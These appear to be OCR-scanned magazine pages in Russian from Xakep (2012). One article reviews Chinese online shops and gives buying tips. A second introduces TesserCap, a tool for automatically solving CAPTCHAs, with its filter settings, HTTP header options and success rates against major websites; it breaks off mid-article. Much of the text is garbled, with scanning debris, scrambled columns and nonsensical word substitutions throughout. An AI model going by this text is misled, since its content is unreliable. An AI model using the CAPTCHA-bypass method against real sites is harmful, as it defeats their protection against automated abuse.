Кита СЕМЬ КИТАЙСКИХ ИНТЕРНЕТ­ МАГАЗИНОВ СО ВСЯКОЙ ВСЯЧИНОЙ Где максимально по дешевый цене дозволяется справить планшетник держи Aпdгoid?

Или осциллограф? Или, ко примеру, лазер? А запчасти в целях разбитого смартфона? Да вслед за тем же, идеже равным образом десятки тысяч других самых разных

товаров, которые во огромных количества х штампуются во Поднебесной, -в китайских интернет-магазинах. И, почто важно, согласно самым доступным ценам .

MADE IN CHINA Три знакомых стихи

насчёт нескольких изо них- тех, вместе с которыми имел

<<Made in China >>

века

обос н авались получи касательно гр ом н ом количестве все­

труд либо моя особа сам, либо мои др узь я. Сразу хочу предупредить, что-то отбор магазина- злоба дня

возможных товаров, во особенности возьми технике.

субъективный. Перед кто хочешь покупкой обяза­

Гл у в области было бы допустим , зачем поблизости не без; про­

тельно судя по всему отзывы да имей на виду- весь гда

изводством безграмотный появятся огромные интернет­

лакомиться неграмотный которая вероятность, что-нибудь бандероль

магазины, идеже всё сие д обро не возбраняется справить

потеряется , который предмет торговли окажется бракованным,

по мнению максимально ни зкой ц ене. Д умаю, многие

почто во коробку положат кое-что невыгодный в таком случае или — или соберут

слышали что касается особо раскрученном магазине

группа неграмотный полностью- такое приходится

-

DeaiE xtгeme.com, - аж ежели е щ е нисколько

везде, вне исключений. Н по части вслед те цены, которые

на н ем невыгодный заказывали. Н по части подобных магазинов

предлагают подобны е ма г ази ны , многие г ота·

д овольно много. Сегодня ваш покорный слуга хочу разгласить

ваш брат из сим мириться. П риступ им?

ХАКЕР

03/158/ 0012

'


В небесная империя вслед за пок у пками ?

FocaiPrice.com Категории товаров: eJ~EJ~

0Ь06p3'n>I0Тef'CipMtO

Способы оплаты:

R ICQQJнн•

R:>ealprice ·~.;о •

;\'\ HOOIIHI(H

Бестсе/VIеры

,., Сnецнаnьные nредnоження

Dropshlpplng

Оrзыsы

PayPar€'

Форуны

&с8АН•-•• СкмАQ

[не к всех товаров]

Q :zo М 02. S

.............

ото 04 прежде 05 дней

Срок доставки:

В14део

r Q>On!IID!lh

Дmi~'IG~Ait Иrруwкм Хо6бм ЧiКIII

Водан изо лидеров китайской электронной

АатомОбмnW~wе <11(Q!(CyitPW

коммерции предлагает побольше 00 000 наимено­

013 CIUI8A-Й КQ,ц-1'1

Ст1:рео Н.'(IUHMK

Чi!:ltOJiдii•I PidiCI:IoopH I!:

Мotorola59B~

~ US$7.49

~ USSl

ваний товаров во около 000 категориях [гадже­ ты , аксессуары для ним равно беспричинно далее] . По край­ н ей мере, где-то спирт самостоятельно заявляет. Проверить эти данные сложно, однако то, что-то после этого дозволено обнаружить

~

самого черта,- сие точно. В ассортименте

./

рецидив стонмоаи

магазина имеются копии именитых б рендав

./

t,есплатый ремоlfТ о rечеине 08Dдней

[ох медянка сии китайцы], телефоны да оргтехника

на теценне

00 дней

Мобильные телефонw

• Те~~еФо-

.u~ Androtd • TUie:ФO- С tl!:tCC\PНWOI • Qwerty тt,!J~eФOttw

весь приемлемого качества [судя равно согласно лич­ ному опыту, равным образом соответственно отзывам] .

Комn1>10теры да конме

Фотоаnnв ратw

"

• Ч~wмll.ei\cw

• 0'\nанwе'"..м:

• МР3

~

• КА&еllммде.Р*о'те/IМ

• ltJwo8м.rypw

• Aa'nмtollмn ... welк(I!C(y

• 0Ca6e/ltt ., npeo6pa:JO•aтe

Аксессуары

Apple

• Сец:-

• Аксео:уl""'~~

Первое, что-то привлекло меня рядом знаком­

nк м нoYJfi

.. ttWWIUII

НР-4 м

MPS

емео

• Нio'(IUHIUtM

• Alc.cy"YII•ro~ для :IAPI'Att

o6opyAOfla-

~Оnоеещения

~ в,-...-..-·- -

ст ве вместе с магазином, - сие цены. У некоторых

товаров они были ниже, нежели получи еВау [да-да, китайцы продают счет потерян своего товара

данный раздел может служи ть <<nесочницей>>,

равным образом нате западном аукционе, только да мы вместе с тобой таковой час

идеже дозволительно урвать прикольную мелочевку

Впрочем, доставка, в духе да везде, может затя­

считать малограмотный будем]. Как оказалось поз­

равно приглядеться ко сервису, безвыгодный тратя значи­

нуться. Обычно суждение подле хо дит малограмотный прежде ,

же, случай торговать согласно ценам далее

мых сумм.

нежели при помощи двум недели. Если твоя милость сделаешь за­

Каждый залежь имеет описание, рейтинги

рыночных обусловлена территориальной бли­

как бы у под всех магазинов такого плана.

каз с лишним $20, ведь <<Фокал>> куртуазно привяжет

зостью магазина ко заводам -изгот овителям.

равно отзывы, которые помогут произвести подбор .

для твоей посылке трек-номер на отслежива­

Более тог о, «Фока л >> на виду у всех предлагает

Для оплаты дозволено воспользоваться PayPal.

ния статуса жизнедеятельность .

откинуть в форуме магазина сведения

С недавних пор FocaiPrice стал предполагать

насчёт том, сколько твоя милость эврика какой-либо изо това-

равным образом

WebMoney, хотя в эту пору отнюдь не для того всех товаров .

В целом доход оставляет приятное впе­ чатление , но, клеймящий согласно отзывам, равным образом симпатия далеко не лишен

ямища дешевле,- на таком случае валюта хорош

Магазин неоднократно проводит отличаются как небо и земля акции,

на сех дирекцион дартны х проблем <<ки тайски х>>

пересмотрена. Посетителям вот и все доступен

а интересах некоторых предложений снедать ски­

магазинов: задержки, недокомплект, несоот­

раздел со спецпредложениями, которые

дочные купоны, коды которых позволено обнаружить

ветствие характеристикам.

отсортированы объединение ценам, начиная через одного

во интернете.

доллара. Для сомневаю щихся иначе новичков

Что касается доставки, ведь возлюбленная бесплатная,

КАТЕГОРИИ ТОВАРОВ

ШЕСТЬ СОВЕТОВ ДЛЯ НАЧИНАЮЩИХ 1.

Купоны- сие отличная допустимость сохранить немножко денежек . Причем нахватать шифр купона

нимало малограмотный сложно: их раздают возьми сайтах может статься гeta il menot . com [крупнейший, а англоя зы чный ресурс] , chinaprices.гu , а в свой черед во темат ических сообществах . В конце концов, позволительно банально вбить во искатель <<куnон получи скидку <ИМЯ магазина»> .

0. Чтобы бегом сыскать занимающий тебя опт да соотнести цены, дозволяется nоnробовать сначала восnользоваться специализирован ными nоисковиками. Например seaгchsku.гu ищет по двадцати разным магазинам. Такой а стервис очищать равным образом возьми сайте ch i napгices.гu .

0.

Перед покупкой безграмотный поленись полазать по мнению форумам, nочитать информацию относительно часть сиречь ином магазине- сие может страх до чего nомочь . Изучай nлощадки. Изучай, изучай равным образом сызнова крата изучай.

Dl

Мелкая электроника

r::]

Товарыб;ля

fl

Сувениры

01

Бижутерия

а

Товары ради

I!J

Товары к

автомо

иля

здоровья

детеи

~

u ~

0 D м

Товары для дом а

Игрушки Часы Спортивные товары

Одежда Музыкальные инструменты

Сообществ шоnоголиков не долго думая навалом - ко примеру, форумы ebay-foгum.гu да mySku.гu .

0.

Если снег для голову произошла какая-то оплошность [допустим, nри насчёт тправке , доставке] alias кушать вопросы по ассортименту- малограмотный стесняйся выводить во поддержк у. В аппарат е некот орых магазинов даже если есть русскоговарящие сотруд ники.

0.

При оплате заказа нужно исnользовать всего лишь nроверенную платежную систему. В периалгия шин стве случаев сие

PayPal . Некоторые китайские магазины поддерживают WebMoney равно пусть даже Qiwi, но, PayPal- они оче нь складно умеют делать выбор проблемы

тем малограмотный менее, автор этих строк рекомендую проэксплуатировать

СПОСОБЫ ОПЛАТЫ

PayPal· weьmoney ~;;.

Pa yPal WebMoney

со нерадивыми продав цами.

0.

Терnение, терnение равно сызнова присест терnение. Заказывая чрез интернет, н ужно существовать готовым

Qiwi

подождать. Заказ могут целую вечность формировать, целый век отправлять, а после приостановить получи и распишись таможне

сиречь нате каком-нибудь этапе работы многострадальной П очты Ро ссии.

ХАКЕР ОЗ

/158/ 0012

Кредитные картеж

039


PCZONE

Dealextreme.com Категории товаров: Hom8

$2 Gadgeta

РауРаГ

Срок доставки:

ОТ

01

Тор Sellll"'

Ordar Tracklng

*

Foruma

~ews

SDC..'(I,>INd;I"'IO>e~~Digl:.lloU~m«..,LCOOI;;.!Iy~,I......._C!> а -

• .....• ._"" "EISV 00 Say, fosy ta S1 ~~· • STAAS ol OIC VJdeo Cont~5t "-"с o;ome outl

с---~

Способы оnлаты:

Oeals ~

New Arr1vat s :\\

-

IJ t. a_

-

ДО

_.

00 Д НеЙ

._

Сложнонеупомянутьодинизсамыхизвес~

--·-

ны х китайских магазинов- DeaiE x tгeme . com . Свой главнейший эмпирия покупки на китайских

~.,

интернет-магазинах автор этих строк настил учил не кто иной здесь.

......

-·-·--

Чего автор этих строк токмо безграмотный заказывал: равным образом защитные

пленки, да батарейки, равно фонарики, да отражатель для телефона, равным образом всевозможные аксессуары. Рас­

-

Adulr.Toyi(Нot]

сказывать тута особенно да нечего: нынешний возможность

сделано опробовали тысячи людей. Основное на­ правление магазина- гаджеты, представлен­

C.rtiolder S~e J НOunl

USB Ooclr.lng Statlon

E271 .SW65001<158·

Chllrgerwolt\US8

LumenЗO·I..!OWMe

for iPI>one4/ 05 - !lll(lr.

Dat.a / ~rgl ngcaЫeror

l..iohl Bulb

( АС

CII~CitiveScree n TouchlngК.ndWormer

Gloves • BI.adc(PII<-)

ные во астрономических количествах равно до весть

привлекательным ценам. Е сть двухдолларо­ вая область к мелочевки, разделы новинок

Отследить отбывание не запрещается в соответствии с тр ек-номеру,

равным образом не без; пецпредложений . Аналогично TiпyDeal ,

кой предоставляется нашармака пр да за­

выгода предлагает греться рядом чего равным образом собирать

казе с гаком

бонусные баллы, п убликуя описания либо видео

равным образом отзывы получи форумах, дозволяется резюмировать:

дозволительно быстрее, так паче применить

для товарам. Выполнить оплату потребитель может

D ealextгeme- величественный магазин, у которого

другим ресурсом, особенно сие касается людей,

при помощи

сумме сам недостат ок: серьезная медлитель­

которые занимаются дропшиппингом [посред­

ность [посылку не грех поджидать более месяца!,

ничеством!.

Pa yPa l

либо — либо вместе с п омо щью кредитной картеж ,

быть этом после доставку ни один человек сносно безвыгодный возьмет.

$15. Учиты вая

приватизированный испытание

в чем дело? связано от громадным числом заказов .

Итог: одиночный изо самых раскрученных мага­ зинов. Но ежели тебе нужно выудить залежь в духе

"

Tinydeal.com ';..[

касательно

0 Toup (08)

Категории товаров:

t:::::::"'

..._,."_.

Способы оплаты:

IPhoм, 0 ~ м

РауРаГ

....._..

-

-.д_,.

Срок доставки:

ОТ

0 ДО 05

днеЙ

lhd

..

~~:-- . Кр-.

.. , , . . _

Дрн м Dфме

В ассортименте онлайн-магазина пред­ ставлены электроника, уникальные гаджеты и пропасть самых разных товаров , вдобавок

Иrp'f\IU!IIIIxa66tl . . _ .. дi)uOЦIItlltOCПO

Лидеры продаж )

Cnopflla'I'AWX

~tl:li'lqi-U

~

зa,.,s--c.u..aw

всякий месячишко появляется серия тысяч новинок . Для каждой позиции представлены

подробное описание, рейтинги равным образом отзывы, а временем видео равным образом русскоязычные коммен­

тарии. Порадовал в свою очередь онлайн-чат, идеже я смог борзо почерпнуть ответы бери интере­ сующие меня вопросы, притом для русском

языке. На сайте вкушать раздел спецпредло ­

дарков. Помим по отношению

жений вместе с еженедельными скидками, а тоже

ются кредитные картеж равным образом WеЬМопеу. Впро­

ко товаров, в таком случае пользу кого получения искуситель платн ого

пятидолларовая пространство с целью мелких товаров.

чем, аз многогрешный безвыездно одинаково напористо рекомендую

треки н г-номера валюта хо тя бы одного изо них

Цены сильнее нежели приемлемые , кроме того

вести до этого времени торговые связи чрез

винтернетеможно раскопать купоны получи и распишись скидки

побольше надежно, кризис миновал опровергнуть транзакцию .

должна бытийствовать перед этим $20. В противном случае за треки н г придется приплатить $2-3. Перв ой

[5-7 %1. Плюс ко всему прочему очищать воз­

К тому а в оплату картами не долго думая д ейству­

моей покупкой во этом магазине был телефон,

можность в области купать вещи из-за баллы [так

ет граница во $150.

да всё выздороветь вроде грешно лучше.

называемые ТО Poiпtsl , которые начисляются

Pa yPal,

ко оплате принима­

PayPal-

зто

Доставка во любую точку таблица бесплатна.

одинокий нюанс: ежели на тво ем заказе несколь-

Вывод: в рассуждении тличны й лавка со широким ас­

ради публикацию комментариев да обзоров .

Посылка идет, во вкусе равным образом везде,две-три недели [бы­

сортиментом, адекватные услуги равным образом поддерж­

Приятный бонус- около заказе для сумму

вает, который доходит да из-за неделю, да сие доводится

ка - например, ежели возле получении по какой-то причине

больше

редко!. Трек-номер чтобы отслеживания посылки

никак не хватает, в таком случае по прошествии обращения общепринято вне

выдается быть заказе сверх

проблем высылают недостающее .

$200

тебе предложат найти нераздельно

изо нескольких возможныхнебольших вдоволь

01,0

$35, да туточки убирать

ХАКЕР

03/158/2012


В небесная империя из-за покупками?

Pandawill.com Категории товаров:

МоА uкаукт

mD м

Ht llo , Sign ln Or 0'8g1stor

n

Поисхаn. мсь мага1мн 0Д8СЬ

Способы оплаты :

РауРаГ -

Срок доставкiА:

ото 05 по 05 дней

AxceccyapAppie

С0Т08Ы1611Теnефон

Пn11W8T

Дolol

Мода

Од8*д8Д8Т8Й

(i

П оиск

~~·...----.....,....,..,.~

ХО1,1ПЫОТ8р

-~

fJflЬi;(ё~

Ht'lp

[] RSS

~~~'

~

НС18НН1М

-

Ruulan 0 USD

&'М

live

0611 коо,..а(О)

-

0р3НАW

-~

BceiCaТ8ropt81'"'

All Free Shipping! -

Еще сам мудреный интернет-магазин, ко­

~* ' -

ПРАЗрНИЧНЫЕ КОДЫ КУПОНОВ:

<:" P~NDAWILLB0-5 ,

PANDAWILL150-10, PANDAWILL200-15,

PANDAWILLЗ00 -30,

Подробнюи

'\.

' "~·

PANDAWILL400-50, PANDAWILL500 ;~5 -

торый недовольно ч ем выделяется сре ди конкурен ­

Прямь1е nоставки/Опт Дflillj)a)МOЩotiiUI»-IIInpRIIIYIO

тов. Н о, сверху моего взгляд, лавка максимально

IIOCTHI()IIo\IJolont,~\QfфoptoiOЦiolll,

фотоrрефt~А

roupoe 003 noro Pandow'l.

м:r.с 'Фi'·!J!:W

адаптирован для того русскоговарящих покупате­

лей. Судя в соответствии с отзывам, се г одня симпатия нераздельно изо лиде­

В се что касается

последних

кювет объединение числу продаж во страны СНГ. Н а форуме

новинках nодпис•mься сеичвс?

сайта доступен инициативный русскоязычный раздел, а образчик магазина многократно

Вынrраrь

встречается вместе с потенциальн ыми п оку пателями

Бесплатные ЛOAiJPKII

Тол•ко

сверху тематических ру сских форумах- короче говоря, саппорттут отмен ный. Из заметных преимуществ магазина- меньший ассор ­

Популярные вещи

тимент телефонов (в часть числе равным образом из ради косом

Мода

Новинки

An•

Лю6мтепейl

# Распродажа

Отправьте

Пnаншаты

нам фотографию

по-под популярные марки ! . Вотан моего знакомый при обрел на Pa ndawill иерей уляр н у ю китайскую

ПniMU/e'fP!oo!Й IIONI!bwn.p

вawero малыwа

Alno1Novo7Aurora

н nолучите nодаро~е

Arldtokl4.0 HrfACHIIPS Э кр111 0GB 0GB RАМ

мо д ел ь телефона равным образом остался доволен как бы самой

Topon~necьl Коnичес:тео

US$115.99

покупкой, т а для равным образом быстрой д оста во кой, кото раиса

заняла только червон дн ей. Советую никак не забыть про раздел распродаж- затем дескать йствительно

дозволительно разыскать беда дешевые т овары . Оnлата через PayPal равным образом ли картами Visa равным образом Master Сагd,

предоставления бесnлатного трек-номера: его

вдобавок не грех паркет учит ь заметную ски дк у

позволяется заразиться всего nри заказе возьми сумму

лабаз пользу кого русскоязычного пользователя,

по части купону. До жалование буд е т бесплатной. Един­

не без; выш е $50 (тут за сравнению со конкуре нтам равным образом

хотя бы да безвыгодный со самыми ни зкими ценами держи попу ­

стве нное, что-нибудь ми безграмотный понравилось,- усик л овие

« Панда >> открыто проигрываетl.

лярные товары.

Общее впечатлени е: атомный непривычный

ТРИ ДОПОЛНИТЕЛЬНЫХ МАГАЗИНА NOWSUPPLIER.COM Категории товаров:

m

Способы оплаты: Срок доставки:

MERIMOBILES.COM

BUYINCOINS.COM

Категории товаров:

m~

PayPar -

Способы оплаты:

PayPal

с

Срок доставки:

с

~Е] fj

0

0 прежде 05 дней

Категориитоваров: m~во -

04 вплоть до 05 дней

Способы оплаты:

PayPal· -

Срок доставки:

через

0 до самого 05

дней

Многие семя успешно nриобретали на этом

Интернет-магазин с предприимчивы х

Порадовала до боли быстрая lи, кстати,

магазине планшеты равным образом оставшиеся гаджеты ,

американцев. Посылки приходят изо Китая ,

бесnлатная) разнос , особенноучитывая

а у меня был жалкий опыт: заказав

добро бы на поддержке работают одни << штатовцы >>.

nредновогодние дни. По широте ассортимента

да оплатив телефон, моя персона получил шаблон со

Заказывал у ни х по мнению мелочи- сорока , ЗG-модем

сайт далеко не уступает конкурентам. Из нареканий

урезанным функцианалом (на $30 дешевле)

да стилусы . Как у всякого уважающего себя

-только периодические лаги сайта. Если

равным образом малограмотный того цвета . Печален ажно безвыгодный сам по себе звезда

китайского магазина, плата от PayPal равно бесплатная своз nрисутствуют,

бы не. зто, так ряды занял бы достойное

отnравки безграмотный праздник модели, а то, ась? весь попытки как-то замыслить проблему отнюдь не увенчались

однако nосылки отправляют обычной почтой равно сверх

равно TinyDeal .

успехом. Возможно , от

трекинга .

PayPal

было бы

помещение рядом не без; моими фаворитами FocaiPгice

не задавайся отворить диспут, однако никак не факт.

ЗАКЛЮЧЕНИЕ

позволено сохранить . Если мал без участия отзывов­

обращайся на службу поддержки. Н е забывай :

В заключен равным образом е хочетс моя особа поперед ба крутить , что такое? по части дин равным образом оный

во что-нибудь бы так ни стало уточняй комплек тацию равно харак­

китайские интернет-магазины чуть интересах тех,

но третьяк может взяться изумительный многих магазинах,

теристики : то и дело присылают что-нибудь отличное

кто такой может постоять кого . Е сли что-то -то нужно тогда равным образом

хотя объединение разным ценам. П озтому первоначально сравни

через указанного во описании. Чтобы максимально

сейчас, ведь выгодно отличается семо хоть далеко не заглядывать. И

равно только лишь в дальнейшем совершай заказ. Не поленись

подстраховать себя, оплату л у чше пров одить

костяк правило: тот, кто именно ищет, всякий раз найдет.

пошарить во Сети куnоны для скидку, от ними

вследствие PayPal. В случае проблем неотменно

Удачных покупок' ::Х::

ХАКЕР

03/158/2012


PCZONE

Гурсев Синг х Калра 0gursev.kal ra!a foundstone .com 0

ка н ость ТЕСТИРУЕМ УНИВЕРСАЛЬНУЮ РАСПОЗНАВАЛКУ САРТСНА

Ес ть ра з ные способы с целью обхода САРТСНА, которыми защищены с а й твоя милость . Во - первых , будучи из твуют с п е ц да альные сервисы,

РЕШИТЬ САРТСНА

ем. Взлом Сарtс h а-фи л ьтров» с

#1 05

равным образом

#126

Р летчик п озна во а н ие СА Р ТС Н А - назначение чаще на этого

номеров соответс т венно. Сегодня но ваш покорный слуга хочу

нетривиальна пишущий эти строки . Н а лик нуждаться

ра сс показывать тебе что касается разработке TesseгCap, ко т касательно ­

класть массу разок л ичных фильтров, что­

рую ав т крик называет универсальной решалкой

бы припрятать искаже н ия да п омехи, которыми раз­

СА РТ СНА. Любопы т ная штука, во вкусе ни кру т и.

работчики желают фиксировать твердость ради щ равным образом т ы.

ПЕРВЫЙ ВЗГЛЯД НА TESSERCAP

для оторые равным образом спользуют широкодоступный

Зач а стую п риходится реализо во ыват ь обучае ­

ручно й книга да бу для вально вслед $1

мую сис т ему получи ос н ове нейронных сетей [зто,

Ч ведь не без; д елал виновник п ро г раммы? О н посмотре л ,

предлагают уходить

для слову, невыгодный что-то около от л ожно, равно как може т показа ть­

по образу большей частью подхо д ят ко п р облеме автоматизи­

ся], чтоб д обиться п р иемлемого результ а т а

ро во фактически н ого решения СА Р ТСНА да за п робовал

по части ав т оматизиро на анному р ешению капч. Ч тоб ы

подытожить таковой компетенция во по отношению д ном равно н струмен т е .

понять, по части нежели ваш покорный слуга говорю, лу чш е п по части д нят ь очень во

Автор заметил, что-нибудь в целях удаления ш умов из из ­

0000

капч.

В для ачестве альтернативы м касательно ж н по части познать написать и нтелле ко туальную вместе с да стему,

равным образом прочи т ать заме ч ате л ь н ые ста т ьи <<Вз л ом

браже н ия, т по отношению ест ь реше н ия самой слож н ой

САР Т С Н А: толкование равно прак т ика. Р азбираемся,

задачи быть распознавании капч, чаще постоянно г относительно

вроде л омают ка п чи» да << П что до д смо т рим равным образом рас п озна-

применяются одни да те а фильтры. П олучает-

коток орая согласно опред е ленным

алгор да т м а м достаточно сама выполнять отождествление .

САРТСНА

Обработанная САРТСНА

Распознанный текст

Последнее сейчас дозволено

HMLR

р е ал с ова т ь из в области м ощью

от пец равно альной утилиты .

01,2

С хема анализа САРТСНА- изображени й из через

TesserCap

ХАКЕР

03/158/2012


Проверка получай долговечность

со я, что такое? даже если выполнить комфортабельный инструмент, позволяющий лишенный чего сложных математических

~ ~-

.....

-

преобразований наваливать фильтры получи и распишись из ­

[: 0152\4'] ~ ~~-- ·::

бражения, равно соединить его из ОСR-системой

-

- -

... _

совсем работоспособную относительно грамму. Это, с обстве нн о, равным образом нашел Гурсев Сингх Калра

с компании

McAfee. Зачем

--·==

... 0

L41 ~2~

про распознавания текс т а, т в рассуждении позволяется унаследовать

з т что касается было нужно?

0

01~2\А

Автор утили т ы решил таким об однажды ом про­

\ 'О=

верить, до чего безопасны капчи ко рупных ресурсов. Для тестирования были выбраны т е

-·1 -~ 0

~- ,------

""---""""""""'

Wiilli)

в отношении

-

.

.

0 ~- 0 4755535

[~ __j ·1 ·~3

G1

tт:U.

-

01~

l ~k l 0 ~70 ЭИН

[

интер нет- сайты, которые являют ся са мыми

005Ul76

~~or.- ::::1

ь:

.... ,..с--

J

Предварительная улучшение изображений равным образом равно з любовь

Кандидатами бери касательство во т естировании стали

текста изо капчи

Wikipedia,

еВ ау, а опять же

-~

Ufff:i

--·--·-- -

~

~

...

статистики www . quaпtcast . com/top-sites-1 .

провайдер капч гeCaptcha.

-

01 о 1 0" liJ G 1 0 ~269

посещаемыми за версии известного сервиса

такие монстры, наравне

~~ c:::::!LJ

. _:l/flilf[~

Результат анализа капчи xakep.ru не без; предварительной обработкой изображений . Судя по части результатам, фильтр подобрать далеко не посчастливилось

ИНТЕРФЕЙС. ВКЛАДКА MAIN П осле з ап уска программы п еред нами пред­

нужно что касается придавать значение результаты рас по мнению з нав а н ия

статут функционирования программы, т относительно по части н

стает расстояние из тре мя вкладками:

изображений, касательно тм етив всякий изо них в духе

полно прост. Исходная капча поступает

lmage

на систему предварительной обработки изо­

охватывает азы управления, которые

няя, самый значимая функционирование служит чтобы

бражений, очищающей наплыв говорят с всяких шумов

исnользуются ради зап у ска да остановки теста

передачи любого изображения во систему nред­

да искажений да по мнению конвейеру передающей по­

САРТСНА-изображения, формирования ста­

варительной обработки, во которой задается

лученное картина ОСR-системе, которая

ти стики т еста !сколько отга дан о, а почем

фильтр, удаляющий со изображения шумы да ис­

со тарается опознать шрифт в нем . TesseгCa p

нетl, навиг а ци равным образом равно выбора изображения для того

каже ния. Чт обы подать впадина т инку на сис т ему

имеет диалоговый графиче ский интерфейс

предварительной обработки. В закраина пользу кого ввода

предварител ьн ой обработки, получи д относительно прикокнуть

да обла безусловно е т следующими свойст во ами :

URL-aдpeca принуждён взяться указан строгий

держи требуемом изображении nравой кноnкой

Е сли разбирать во об суп х граница х

0.

0.

0.

Ma in, Options,

P гepгocessing. Основная супинатор

коррек т н ы й либо — либо нетактичный . Н у да послед­

URL-

Имеетуниверсальную систему пре двар равно ­

aдpec, тот или иной веб-приложение использует

мыши да на кон т екс т ном разблюдовка отобрать статья

тельной обработки изображений, которую

про извлечения капч. URL-aдpec не грех по­

Send

не грех держи базировать чтобы каждой отдельной

л вдалбливать следующим образом: кликнув правой

lmage

Рг ергосеssог.

ИНТЕРФЕЙС. ВКЛАДКА OPTIONS

капчи.

для н что касается nко й мыши

Включает во себя сис тем у распознавания

скалькировать не в таком случае — не то пролистать шифр страницы

Вкладка касательно пци й со д ержит непохожие злементы

Tesseгact, которая извлекаеттекст с пред­

равным образом извлечь URL-aдpec изо атрибута sгс тега из ­

уnравления в целях конфигурирова ния TesseгCap.

варительно проанализированного да под­

бражения

Здесь дозволительно поднять ОСR-систему, ради д ать

готовленного САР Т С Н А - изоб ра жения.

гu зто местоположение www.xakep.гu/common / гateit/

Поддерживаетиспользованиеразличных

captcha.asp?name=xakep . гu . Ряд ом со стро-

сацию равно предварительную обработку изобра­

ко дир овок во системе распознавания .

ко ой а др еса находится элеме нт, задающий

но ни й, примолвить пользовательские НТТР­

ко оличество капч, которые н ужно найти дело

следовать головки , а тоже назвать диапаз что касается н символов

Думаю, универсальный доминанта понятен, поэто м у

чтобы тестирования. Та ко вроде использование может

на системы расnознавания: цифры, буквы

no

<img>.

САРТСНА-изображению,

То

Н апример, на случае вместе с

xakep.

предлагаю посмотреть, в духе сие выглядит .

синхронно nоказывать лишь только

Универсал ьн волос утилиты н е могла малограмотный приве­

б р ажений, на нем предусмотрены азбука

сти для усложнению ее интерфейса, п оэтому ок н в рассуждении

у пр авления чтобы постраничного п ролистывания

программы может вв ести на незначительный от т у пор .

загружен ны х нарост ч . Та ким образом, рядом мас­

02

изо­

объем веб-прокси, сделать смешанный частью nереадре­

на нижнем регистре, буквы во верхнем регистре , сnециальные символы.

Теперь насчёт каждой оnции поподробней . Пр ежонок д е всего, позволено найти ОСR-систему.

Так что, под т ем во вкусе п ереходить н е п ос ред­

штабном тестировании наш брат сможем nроли­

П касательно умолча нию д оступна только лишь одна ­

ствен н что касается ко ра спознаванию капч, предл агаю

ст ыв ать загруженныекапч ии пр исследовать

Te sseгact -ORC , приблизительно в чем дело? замора чивать ся

разобраться вместе с ее интерфейсом равно заложенным

результаты их распознавания. Кнопки Staгt

из выбором т ут малограмотный придется. Еще одна адски

функциона л ом.

равным образом

интересная допустимость программы- вы­

Stop запускают

равно оста н ав лива полуют тестиро­

вание соо тветствен но. По не без; ле те со т ирования

краснолесье диапазона символов . Возьмем, напри­ мер, капчу от xakep . гu- видно, ась? возлюбленная безграмотный со­

д е ржит н да одной букв ы , а состои т т в рассуждении льк о из цифр. Так для чего нам лишние символы, которые лишь увеличат возможность никак не кор­

ОБАВТОРЕ

р ектного распознавания? Конечно, они нам ни для чему, потому-то рядом тестировании капчи

xake p.гu отличается как небо ото земли указать, ась? симпатия содержит Мы безвыгодный могли безвыгодный высказать х отя бы испарения слов об

Подразделение профессиональны х услуг

в рассуждении пора цифры: Num eгics. Но что такое? когда прибрать

авторе замечательной утилиты TesseгCap .

FoundstoneФ, на котором возлюбленный трудится, nредлагает

Uррег

Его зовут Гурсев Синг х Калра . Он работает

организациям эксnертные служба равно обучение,

п ознать капчу, состоящую изо заглавных букв

главным консультантом на подразделении

обесnечивает nостоянную да действенную

любого языка? Н ет, никак не сможе т. Пр ограмма бе­

профессиональных услуг

защиту их активов ото самых серьезных угроз.

рет опись символов, используемых в целях рас­

во х одит на ансамбль

Команда nодразделения nрофессиональны х

познавания, изо конфигурацио нны х файлов,

услуг состоит с признанных экспертов

находящихся во \Ргоgгаm

во области безоnасности да разработчиков,

Fг ее Too l s\TesseгCa р

Foundstone, которое комnании McAfee . Гурсев

выступал в таких конференциях, в качестве кого Тоог­ Соn ,

NuiiCon

равно

ClubHack. Является

автором

Case?

Сможет ли пр ограмма рас­

Files\ Foundstone 1.0\tess data\co nfig s\ .

инструментов TesseгCap равным образом SSLSmaгt . Помимо

имеющих роскошный оnыт сотрудничества

П оясню бери прим ере : если бы пишущий сии строки выбрали

сие го , разработал порядочно инструментов интересах

со международными корnорациями

опции Numeгics равным образом L oweг

внутренних нужд комnании . Любимые языки

да государственными организациями

обратится для файлу loweгпumeгic, начинаю­

по части воnросам безоnасности .

щ емуся из параметра tessedit _ chaг_whitelist.

программирования-

ХАКЕР

03/158/ 0012

Ruby, Ruby on Rails

да С#.

Case,

ведь пр ограмма


PCZONE За ним должно роспись символов, которые

ИНТЕРФЕЙС . ВКЛАДКАIМАGЕ

будут употребляться про решения капчи.

PREPROCESSING

По умолчанию на файлах содержатся всего лишь

Н у вона пишущий сии строки равным образом добрались давно самой интересной

буквы латинского алфавита, эдак зачем ради рас­

вкладки . Именно т ут настраиваются фил ьт ры

познавания кириллицы полагается променять или — или

ради у д а л е н ия из капч различных шумов равным образом раз­

мытий, которые стараются максимально

увеличить ведомость символов.

Теперь маленечко что до том, для того аюшки? нужно поле

Http Request

Headeгs. Например, бери не­

Процесс настройки универсального фильтра предельнопрости состоит изо девяти каста п ов.

того с тем вкусить капчу. Чтобы TesseгCap

Изменения изображения отображаются возьми

смогла нахватать ход ко капче, программе

каждом этапе предварительной обрабо т ки.

никуда не денешься отдать во запросе НТТР такие

Кроме того, возьми странице дано компо-

заголовки, что Ассер!,

нент проверки, каковой позволяет просчитать

равным образом Rеfеггег

равно т. д . Используя веб-прокси IFiddleг, Вuгр, Chaгles, WebScaгab, Рагоs равно т. д.l, можно перехватить посылаемые заголовки запро­

са равно назначить их во закраина ввода

наложенном фильтре. Рассмотрим подробно каждый этап.

H eadeгs. Еще одна опция, ко т орая навер ­

Этап

няка пригодится,- сие

На данном этапе инвертируются цвета

Rediгects.

Веб-сайт

Доля распознанных капч

Wikipedia

00-30%

ЕЬау

00-30%

reddit.com

00-30%

CNBC

>50%

foodnetwoгk.com

00-90%

dailymail.co. uk

>30%

megaupload .com

>80%

правильнесть распознавания капчи рядом

Http Request

Follow

САЙТАХ

усугубить задачу системе распоз н авания.

которых веб-сайтах нужно залогиниться, с целью

Cookie

РЕЗУЛЬТАТ ПРОВЕРКИ САРТСНА НА ПОПУЛЯРНЫХ

0.

Инверсия цвета

Дело во том, что-нибудь TesseгCap объединение умолчанию

пикселей для того САРТСНА-изображений. Код,

отнюдь не долженствует переадресации. Если испытательный

изображённый ниже, демонстрирует, как бы сие

pasteЬin.com

00-80%

URL-aдpec надо что-то обуславливаться чем-то переадресации

происходит:

cavenue.com

>80%

с целью получения изображения, нужно выбрать эту опцию.

Ну равным образом осталась последняя опция, вклю­

